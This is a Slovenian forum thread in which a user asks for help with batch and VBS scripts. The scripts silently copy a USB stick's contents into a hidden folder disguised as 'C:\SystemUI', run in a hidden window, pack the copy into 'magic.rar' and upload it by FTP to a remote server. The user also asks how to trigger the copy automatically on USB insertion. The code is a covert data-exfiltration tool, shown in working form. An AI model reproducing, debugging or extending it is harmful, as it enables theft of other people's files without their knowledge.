Forum » Pomoč in nasveti » Skriptiranje - batch
Skriptiranje - batch
Balaton ::
Pozdravljeni slo-techovci. Upam da mi je kdo pripravljen pomagati pri slednjem problemu.
Preko .bat in .vbs fajlov poskušam prenesti vse kar je na USB ključku (multimedija je iz tega izključena) na računalnik, na računalniku zazippati in ta zip fajl poslati na poljuben ftp server. Torej, to predstavlja moj skromni višek programiranja, zato upam na potrpežljivost pri mojem neznanju :P
Za prenos iz USB na HDD uporabljam slednjo kodo v copy.bat fajlu.
copy.bat zaženem pa preko launch.vbs
Torej, ta koda še ni čisto izpopolnjena, ker ne najdem komande, ki bi počakala na USB insertion in iz USB directoryja prekopirala vse na C:\SystemUI . Tukaj bom torej po vsej verjetnosti dal en timer, ker je iskanje omenjene komande res misija nemogoče, verjetno ne obstaja. Sem hotel prek launch.vbs to "sprogramirati", pa tudi nisem našel relevantnih informacij.
Zdej tole je sprva 1. korak, če uspem tole pofixati se bom spravil še na 2. in 3. korak.
Se zahvaljujem za kakršne koli odgovore :)
Preko .bat in .vbs fajlov poskušam prenesti vse kar je na USB ključku (multimedija je iz tega izključena) na računalnik, na računalniku zazippati in ta zip fajl poslati na poljuben ftp server. Torej, to predstavlja moj skromni višek programiranja, zato upam na potrpežljivost pri mojem neznanju :P
Za prenos iz USB na HDD uporabljam slednjo kodo v copy.bat fajlu.
@ECHO OFF XCOPY H: C:\SystemUI /E /H /I /Q /Y ATTRIB +H C:\SystemUI EXIT
copy.bat zaženem pa preko launch.vbs
Set WshShell=WScript.CreateObject("WScript.Shell") obj=WshShell.Run("copy.bat",0) Set WshShell=Nothing
Torej, ta koda še ni čisto izpopolnjena, ker ne najdem komande, ki bi počakala na USB insertion in iz USB directoryja prekopirala vse na C:\SystemUI . Tukaj bom torej po vsej verjetnosti dal en timer, ker je iskanje omenjene komande res misija nemogoče, verjetno ne obstaja. Sem hotel prek launch.vbs to "sprogramirati", pa tudi nisem našel relevantnih informacij.
Zdej tole je sprva 1. korak, če uspem tole pofixati se bom spravil še na 2. in 3. korak.
Se zahvaljujem za kakršne koli odgovore :)
- spremenilo: Balaton ()
Balaton ::
Okej, za enkrat je vse kul. Prekopira mi lepo z usb-ja, čeprav nisem čisto zadovoljen z načinom, ter mi converta, toda noče mi poslati na ftp server.
.vbs koda ostaja ista, copy.bat pa upam da mi bo kdo pregledal kaj je narobe.
ftp_data.txt
Zakaj mi noče poslati datoteke na ftp server? :/
P.S. - IP, username pa password sem zbrisal, iz očitnih razlogov :)
.vbs koda ostaja ista, copy.bat pa upam da mi bo kdo pregledal kaj je narobe.
@ECHO OFF XCOPY H: C:\SystemUI /E /H /I /Q /Y ATTRIB +H C:\SystemUI setlocal set dir=C:\SystemUI cd %dir% set path="C:\Program Files\WinRAR\";%path% rar a -r "magic.rar" :eof C:\WINDOWS\system32\ftp.exe -s:ftp_data.txt pause
ftp_data.txt
open (ip name here) username password binary put C:\SystemUI\magic.rar quit
Zakaj mi noče poslati datoteke na ftp server? :/
P.S. - IP, username pa password sem zbrisal, iz očitnih razlogov :)
Zgodovina sprememb…
- spremenilo: Balaton ()
Vredno ogleda ...
Tema | Ogledi | Zadnje sporočilo | |
---|---|---|---|
Tema | Ogledi | Zadnje sporočilo | |
» | batch fajl iz txt (strani: 1 2 )Oddelek: Programiranje | 9701 (8362) | b3D_950 |
» | .vbs & .batOddelek: Programiranje | 1032 (952) | darkolord |
» | Login scriptOddelek: Programiranje | 1093 (1027) | Mercier |
» | Pomoč pri nastavitvah NTbackup.exe v win xpOddelek: Programska oprema | 1667 (1396) | XWY |
» | Kako bi napisal .bat file, da bi ...Oddelek: Programiranje | 1896 (1342) | AtaStrumf |